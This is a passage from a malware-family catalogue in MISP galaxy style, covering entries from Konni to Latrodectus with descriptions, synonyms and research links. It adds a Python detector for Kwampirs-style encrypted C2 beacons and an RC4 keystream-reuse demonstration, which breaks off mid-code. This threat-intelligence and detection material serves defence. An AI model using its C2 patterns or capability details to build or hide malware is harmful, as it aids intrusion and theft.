- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/ - webarchive
- https://e.cyberint.com/hubfs/Cyberint_Konni%20Malware%202019%20Campaign_Report.pdf - webarchive
- https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/ - webarchive
- https://wezard4u.tistory.com/6693 - webarchive
- http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-227a - webarchive
- https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html - webarchive
- https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant - webarchive
- https://blog.alyac.co.kr/2474 - webarchive
- https://blog.lumen.com/new-konni-campaign-targeting-russian-ministry-of-foreign-affairs/ - webarchive
- https://medium.com/@DCSO_CyTec/to-russia-with-love-assessing-a-konni-backdoored-suspected-russian-consular-software-installer-ce618ea4b8f3 - webarchive
- https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/ - webarchive
- https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html - webarchive
- https://threatmon.io/the-konni-apt-chronicle-tracing-their-intelligence-driven-attack-chain/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/ - webarchive
- http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html - webarchive
- https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KoobFace
Internal MISP references
UUID 9430ce27-c8c5-44fb-9255-47d76a8903b3
which can be used as unique global reference for KoobFace
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Korlia
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Korlia.
Known Synonyms |
---|
Bisonal |
Internal MISP references
UUID 52d98d2f-db62-430d-8658-5cadaeff6cd7
which can be used as unique global reference for Korlia
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia - webarchive
- https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-bisonal-malware-used-attacks-russia-south-korea/ - webarchive
- https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf - webarchive
- https://web.archive.org/web/20130920120931/https:/www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf - webarchive
- https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html - webarchive
- https://blog.talosintelligence.com/2020/03/bisonal-10-years-of-play.html - webarchive
- https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf - webarchive
- https://securitykitten.github.io/2014/11/25/curious-korlia.html - webarchive
- https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/ - webarchive
- https://asec.ahnlab.com/1298 - webarchive
- http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit - webarchive
- https://www.youtube.com/watch?v=_fstHQSK-kk - webarchive
- https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2014-11-25-curious-korlia.md - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_3_takai_jp.pdf - webarchive
- https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.93_ENG.pdf - webarchive
- https://www.slideshare.net/StefanoMaccaglia/bsides-ir-in-heterogeneous-environment - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-huntley - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ - webarchive
- https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kovter
Kovter started as police ransomware and later turned into ad-fraud malware. Timeline:
- Feb 2012: police ransomware
- Aug 2013: became ad-fraud malware
- Mar 2014: shifted from ransomware to ad-fraud malware
- June 2014: distributed from the Sweet Orange exploit kit
- Dec 2014: ran as an affiliate node
- Apr 2015: spread via the Fiesta and Nuclear Pack exploit kits
- May 2015: Kovter became fileless
- 2016: malvertising campaign targeting Chrome and Firefox
- June 2016: change in persistence mechanism
- July 2017: Nemucod and Kovter packed together
- Jan 2018: Cylance report on persistence
Internal MISP references
UUID af3a0643-7a80-4b8f-961b-aea18e78715e
which can be used as unique global reference for Kovter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter - webarchive
- https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/ - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa20-345a - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://0xchrollo.github.io/articles/unpacking-kovter-malware/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://www.cybereason.com/blog/how-click-fraud-commodity-malware-transforms-into-an-advanced-threat - webarchive
- https://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update - webarchive
- https://0x00sec.org/t/analyzing-modern-malware-techniques-part-1/18663 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/ - webarchive
- https://github.com/itaymigdal/malware-analysis-writeups/blob/main/Kovter/Kovter.md - webarchive
- https://ry0dan.github.io/malware%20analysis/unpacking-kovter-malware/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/kovter-an-evolving-malware-gone-fileless - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KPOT Stealer
KPOT is an information-stealing trojan distributed through phishing emails and malicious websites. Once executed, it steals passwords, credit card numbers and other personal information from the infected computer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KPOT Stealer.
Known Synonyms |
---|
Khalesi |
Kpot |
Internal MISP references
UUID b1fe4226-1783-48d4-b1d2-417703a03b3d
which can be used as unique global reference for KPOT Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer - webarchive
- https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/new-kpot-v20-stealer-brings-zero-persistence-and-memory-features-silently-steal - webarchive
- https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf - webarchive
- https://blag.nullteilerfrei.de/2020/04/26/use-ghidra-to-decrypt-strings-of-kpotstealer-malware/ - webarchive
- https://isc.sans.edu/diary/25934 - webarchive
- https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/ - webarchive
- https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/kpot2/KPOT.md - webarchive
- https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors - webarchive
- https://isc.sans.edu/diary/26010 - webarchive
- https://news.drweb.com/show/?i=13242&lng=en - webarchive
- https://blog.ensilo.com/game-of-trojans-dissecting-khalesi-infostealer-malware - webarchive
- https://medium.com/s2wlab/deep-analysis-of-kpot-stealer-fb1d2be9c5dd - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Krachulka
According to ESET, this malware family is a banking trojan and was active in Brazil until the middle of 2019. Its most noticeable characteristic was its usage of well-known cryptographic methods to encrypt strings, as opposed to the majority of Latin American banking trojans that mainly use custom encryption schemes.
Internal MISP references
UUID 1ddcb067-e876-4eff-8bb7-e28c089d99a3
which can be used as unique global reference for Krachulka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kraken
A ransomware that was active in 2018.
Internal MISP references
UUID 3d7ae6b9-8161-470e-a7b6-752151b21657
which can be used as unique global reference for Kraken
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kraken - webarchive
- https://www.recordedfuture.com/kraken-cryptor-ransomware/ - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
- https://securingtomorrow.mcafee.com/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/ - webarchive
- https://www.bleepingcomputer.com/news/security/kraken-cryptor-ransomware-masquerading-as-superantispyware-security-program/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KrakenKeylogger
KrakenKeylogger is a .NET-based infostealer sold on underground hacking forums.
Internal MISP references
UUID 6b15469a-64ff-4edc-99dd-60f7a277d5c1
which can be used as unique global reference for KrakenKeylogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KrBanker
ThreatPost describes KRBanker (BlackMoon) as a banking trojan designed to steal user credentials for various South Korean banking institutions. It was discovered in early 2014 and has since adopted a variety of infection and credential-stealing techniques.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KrBanker.
Known Synonyms |
---|
BlackMoon |
Internal MISP references
UUID f4008c19-e81a-492a-abfe-f177e1ac5bce
which can be used as unique global reference for KrBanker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker - webarchive
- https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan - webarchive
- http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/ - webarchive
- https://www.peppermalware.com/2019/03/analysis-of-blackmoon-banking-trojans.html - webarchive
- https://fidelissecurity.com/threatgeek/threat-intelligence/blackmoon-banking-trojan-new-framework/ - webarchive
- https://www.rapid7.com/blog/post/2023/07/13/old-blackmoon-trojan-new-monetization-approach/ - webarchive
- https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KrDownloader
Internal MISP references
UUID c346faf0-9eb4-4f8a-8547-30e6641b8972
which can be used as unique global reference for KrDownloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kronos
Kronos is a banking trojan that first emerged in 2014. It targets customers of financial institutions to steal sensitive banking information and is spread mainly through phishing campaigns and exploit kits. Once installed on a victim's computer, Kronos captures login credentials, credit card details and other personal information through keylogging and form grabbing, and includes features intended to defeat two-factor authentication. It uses evasion techniques to avoid detection by antivirus software and is actively updated by its operators. It has been used against a wide range of banking systems and has affected numerous organizations worldwide, and it continues to evolve.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kronos.
Known Synonyms |
---|
Osiris |
Internal MISP references
UUID 62a7c823-9af0-44ee-ac05-8765806d2a17
which can be used as unique global reference for Kronos
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/ - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/kronos-reborn - webarchive
- https://therecord.media/osiris-banking-trojan-shuts-down-as-new-ares-variant-emerges/ - webarchive
- https://blog.morphisec.com/long-live-osiris-banking-trojan-targets-german-ip-addresses - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html - webarchive
- https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/ - webarchive
- https://twitter.com/3xp0rtblog/status/1294157781415743488 - webarchive
- https://vx-underground.org/archive/APTs/2017/2017.12.11/Money%20Taker.pdf - webarchive
- https://unit42.paloaltonetworks.com/banking-trojan-techniques/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware - webarchive
- https://www.zdnet.com/article/security-researcher-malwaretech-pleads-guilty/ - webarchive
- https://www.zscaler.com/blogs/security-research/ares-malware-grandson-kronos-banking-trojan - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/ - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/ - webarchive
- https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack - webarchive
- https://dissectingmalwa.re/osiris-the-god-of-afterlifeand-banking-malware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KryptoCibule
Internal MISP references
UUID 8039c56c-3be1-4344-81cf-6c21b06bbaa6
which can be used as unique global reference for KryptoCibule
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KSL0T
A keylogger used by Turla.
Internal MISP references
UUID aa93d030-abef-4215-bc9e-6c7483562d19
which can be used as unique global reference for KSL0T
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ksl0t - webarchive
- https://0ffset.wordpress.com/2018/10/05/post-0x17-2-turla-keylogger/ - webarchive
- https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-2/ - webarchive
- https://0ffset.net/reverse-engineering/malware-analysis/analyzing-turlas-keylogger-1/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KTLVdoor (Windows)
According to Trend Micro, KTLVdoor is a highly obfuscated malware that masquerades as different system utilities, allowing attackers to carry out a variety of tasks including file manipulation, command execution, and remote port scanning.
Internal MISP references
UUID c9d1948b-1db0-4d99-8a25-c2deb7e0030c
which can be used as unique global reference for KTLVdoor (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kuaibu
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Kuaibu.
Known Synonyms |
---|
Barys |
Gofot |
Kuaibpy |
Internal MISP references
UUID 7d8943a4-b710-48d3-9352-e9b42516d2b7
which can be used as unique global reference for Kuaibu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kuiper (Windows)
Internal MISP references
UUID 3b8fb979-154f-434e-8bc1-a2836d9defe9
which can be used as unique global reference for Kuiper (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kuluoz
Internal MISP references
UUID f9b3757e-99c7-4999-8b79-87609407f895
which can be used as unique global reference for Kuluoz
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kurton
Internal MISP references
UUID 1fc49b8c-647a-4484-a2f6-e6f2311f8b58
which can be used as unique global reference for Kurton
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kutaki
Cofense characterizes Kutaki as a data stealer that uses old-school techniques to detect sandboxes and debuggers. These techniques nonetheless work quite well against unhardened virtual machines and other analysis systems. By backdooring a legitimate application, Kutaki can fool unsophisticated detection methods.
Internal MISP references
UUID ff40299b-dc45-4a1c-bfe2-3864682b8fea
which can be used as unique global reference for Kutaki
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Kwampirs
Kwampirs is a malware family that spreads via SMB. It typically will not execute or deploy in environments without a publicly available admin$ share. It is a fully featured backdoor that can download additional modules. Typical C2 traffic is over HTTP and includes "q=[ENCRYPTED DATA]" in the URI.
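As an added illustration of the C2 pattern described above (example code written for this entry, not code from the Kwampirs reports or from Malpedia), the following Python script scans HTTP proxy log lines and flags requests whose `q` parameter looks like an encrypted blob rather than a search query. The log format, client addresses, hosts and the length/entropy thresholds are constructed assumptions for the example, not values published for Kwampirs.

```python
"""Heuristic detection of Kwampirs-style "q=[ENCRYPTED DATA]" beacons in proxy logs.

Assumptions (not from the Malpedia entry): the Squid-like log layout below
(timestamp, client IP, method, URL, status) and the numeric thresholds are
illustrative choices for this example.
"""
import math
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample proxy log. The first line imitates the beacon pattern;
# the others are ordinary traffic, some of which also carries a "q" parameter.
SAMPLE_LOG = """\
1700000000.101 10.0.0.5 GET http://198.51.100.23/index.php?q=aR3kZ9Lm2WqX7vT1pB5nH8cJ4dF6gY0sKeUiMoExNrQwAzVtGjl= 200
1700000000.205 10.0.0.7 GET http://www.example.com/search?q=printer+driver 200
1700000000.310 10.0.0.9 GET http://www.example.com/search?q=windows+update+error+0x80070005+fix 200
1700000000.412 10.0.0.9 GET http://cdn.example.net/api?q=dGVzdA== 200
1700000000.517 10.0.0.11 GET http://www.example.com/index.html 200
"""

# Alphabet of a base64- or hex-encoded blob; a decoded search query contains
# spaces and punctuation and therefore fails this check.
ENCODED_BLOB = re.compile(r"^[A-Za-z0-9+/=]+$")


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of `text` (0.0 for the empty string)."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def q_parameter(url: str):
    """Return the first `q` query parameter of `url`, or None if absent."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get("q")
    return values[0] if values else None


def looks_like_kwampirs_beacon(url: str, min_len: int = 32, min_entropy: float = 4.5) -> bool:
    """True when the URL carries a `q` value that looks like ciphertext:
    long enough, restricted to an encoded-blob alphabet, and high-entropy.
    Search engines also use `q=`, so the alphabet and entropy checks are
    what separate an encrypted payload from a natural-language query."""
    value = q_parameter(url)
    if value is None or len(value) < min_len:
        return False
    if not ENCODED_BLOB.match(value):
        return False
    return shannon_entropy(value) >= min_entropy


def flag_beacons(log_text: str) -> list:
    """Scan proxy log lines; return (client, host, q-entropy) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line: skip it rather than abort the scan
        _ts, client, _method, url, _status = fields[:5]
        if looks_like_kwampirs_beacon(url):
            entropy = round(shannon_entropy(q_parameter(url)), 2)
            hits.append((client, urlsplit(url).hostname, entropy))
    return hits


if __name__ == "__main__":
    for client, host, entropy in flag_beacons(SAMPLE_LOG):
        print(f"suspicious beacon: {client} -> {host} (q entropy {entropy} bits)")
```

Only the first constructed line is reported: the second and fourth fail the length check, and the third is a long search query that `parse_qs` decodes to words separated by spaces, which the alphabet check rejects before entropy is even considered. In a real deployment the thresholds should be tuned against the organization's own baseline of legitimate `q=` traffic, and a hit is a lead for host triage (the admin$ share and SMB activity noted above), not proof of infection on its own.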
Internal MISP references
UUID 2fc93875-eebb-41ff-a66e-84471c6cd5a3
which can be used as unique global reference for Kwampirs
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs - webarchive
- https://resources.cylera.com/new-evidence-linking-kwampirs-malware-to-shamoon-apts - webarchive
- https://thehackernews.com/2022/03/researchers-find-new-evidence-linking.html - webarchive
- https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf - webarchive
- https://blog.reversinglabs.com/blog/unpacking-kwampirs-rat - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia - webarchive
- https://www.zdnet.com/article/fbi-warns-about-ongoing-attacks-against-software-supply-chain-companies/ - webarchive
- https://resources.cylera.com/hubfs/Cylera%20Labs/Cylera%20Labs%20Kwampirs%20Shamoon%20Technical%20Report.pdf - webarchive
- https://www.zdnet.com/article/fbi-re-sends-alert-about-supply-chain-attacks-for-the-third-time-in-three-months/ - webarchive
- https://www.securityartwork.es/2019/03/13/orangeworm-group-kwampirs-analysis-update/ - webarchive
- http://www.documentcloud.org/documents/6821581-FLASH-CP-000111-MW-Downgraded-Version.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ladon
According to its own description, Ladon is a multi-threaded, plugin-based scanning tool for large-scale network penetration. It covers port scanning, service identification, network asset discovery, password brute-forcing, detection of high-risk vulnerabilities and one-click getshell. It supports batch scanning of A-, B- and C-class ranges and across network segments, as well as scanning from lists of URLs, hosts and domain names.
Internal MISP references
UUID 5c63623b-aa84-41a5-9e3e-f338edf72291
which can be used as unique global reference for Ladon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ladon - webarchive
- https://github.com/k8gege/Ladon - webarchive
- https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/ - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://asec.ahnlab.com/en/47455/ - webarchive
- https://asec.ahnlab.com/en/56236/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LALALA Stealer
Internal MISP references
UUID 62f1846f-3026-4824-b739-8f9ae5e9c8bb
which can be used as unique global reference for LALALA Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lalala_stealer - webarchive
- https://blog.prevailion.com/2020/03/the-curious-case-of-criminal-curriculum.html - webarchive
- https://www.hornetsecurity.com/en/security-information/information-stealer-campaign-targeting-german-hr-contacts/ - webarchive
- https://securitynews.sonicwall.com/xmlpost/lalala-infostealer-which-comes-with-batch-and-powershell-scripting-combo/ - webarchive
- https://twitter.com/luc4m/status/1276477397102145538 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lambert (Windows)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Lambert (Windows).
Known Synonyms |
---|
Plexor |
Internal MISP references
UUID 3af9397a-b4f7-467d-93af-b3d77dcfc38d
which can be used as unique global reference for Lambert (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert - webarchive
- https://twitter.com/CPResearch/status/1484502090068242433 - webarchive
- https://www.youtube.com/watch?v=jeLd-gw2bWo - webarchive
- https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/ - webarchive
- https://ti.qianxin.com/blog/articles/network-weapons-of-cia/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7ca2e331-2209-46a8-9e60-4cb83f9602de&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LambLoad
According to Microsoft, this is a downloader used in a supply chain attack involving a malicious variant of an application developed by CyberLink. It is centered around a legitimate CyberLink application installer that has been modified to include malicious code that downloads, decrypts, and loads a second-stage payload. The file, which was signed with a valid certificate issued to CyberLink Corp., is hosted on legitimate update infrastructure owned by CyberLink and includes checks that limit the time window for execution and evade detection by security products.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular LambLoad.
Known Synonyms |
---|
OfficeCertTea |
Internal MISP references
UUID a67f59fd-92dc-43b0-b9df-220384dbe5a4
which can be used as unique global reference for LambLoad
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.lambload - webarchive
- https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Lamdelin
Internal MISP references
UUID da79cf10-df9f-4cd3-bbce-ae9f357633f0
which can be used as unique global reference for Lamdelin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LaplasClipper
Clipboard stealer (clipper): monitors the clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled addresses.
Internal MISP references
UUID cc2c0c2a-b233-4d51-9e0a-ae91043c952c
which can be used as unique global reference for LaplasClipper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.laplas - webarchive
- https://embee-research.ghost.io/laplas-clipper-infrastructure/ - webarchive
- https://blog.cyble.com/2022/11/02/new-laplas-clipper-distributed-by-smokeloader/ - webarchive
- https://twitter.com/Gi7w0rm/status/1604999633792647169 - webarchive
- https://any.run/cybersecurity-blog/analyzing-laplasclipper-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LatentBot
FireEye describes this malware as a highly obfuscated bot that has been in the wild since mid-2013. It has managed to leave hardly any traces on the Internet, is capable of watching its victims without ever being noticed, and can even corrupt a hard disk, thus making a PC useless.
Using Dynamic Threat Intelligence, they have observed multiple campaigns targeting multiple industries in the United States, United Kingdom, South Korea, Brazil, United Arab Emirates, Singapore, Canada, Peru and Poland – primarily in the financial services and insurance sectors. Although the infection strategy is not new, the final payload dropped – which they named LATENTBOT – caught attention since it implements several layers of obfuscation, a unique exfiltration mechanism, and has been very successful at infecting multiple organizations.
Internal MISP references
UUID 7fc74551-013f-4dd1-8da9-9266edcc45d0
which can be used as unique global reference for LatentBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot - webarchive
- https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/ - webarchive
- https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/ - webarchive
- http://malware-traffic-analysis.net/2017/04/25/index.html - webarchive
- https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Latrodectus
First discovered in October 2023, Latrodectus (also tracked as BLACKWIDOW) is a backdoor written in C that communicates over HTTP using RC4-encrypted requests. It can execute discovery commands, query information about the victim's machine, update itself, and download and execute an EXE, DLL or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of the IcedID (aka BokBot) malware.
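The RC4 transport is the detail a responder actually needs when looking at a capture. The block below is an added example written for this page, not code from Latrodectus or from any of the linked reports: a plain RC4 implementation checked against a published test vector, followed by a demonstration of what a stream cipher gives away when one key is reused across requests. The page does not say Latrodectus keys its traffic that way; the static key, its value and the two beacon bodies are constructed for the demo.

```python
"""RC4 for C2-traffic triage: added example, not Latrodectus code.

Standard RC4 (KSA + PRGA). The static key and the beacon bodies below are
constructed for the demonstration; the page only says the backdoor sends
RC4-encrypted HTTP requests.
"""


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt `data` under `key` (RC4 is symmetric)."""
    s = list(range(256))
    j = 0
    for i in range(256):                          # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                             # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def recover_with_known_plaintext(c_known: bytes, p_known: bytes, c_target: bytes) -> bytes:
    """Keystream reuse: with one known plaintext under a reused key, the
    recovered keystream decrypts the same-length prefix of any other message."""
    keystream = xor_bytes(c_known, p_known)
    return xor_bytes(c_target, keystream)


# Published RC4 test vector: key "Key", plaintext "Plaintext".
RC4_VECTOR = (b"Key", b"Plaintext", bytes.fromhex("bbf316e8d940af0ad3"))

# Constructed static key (an assumption for the demo) and constructed beacons.
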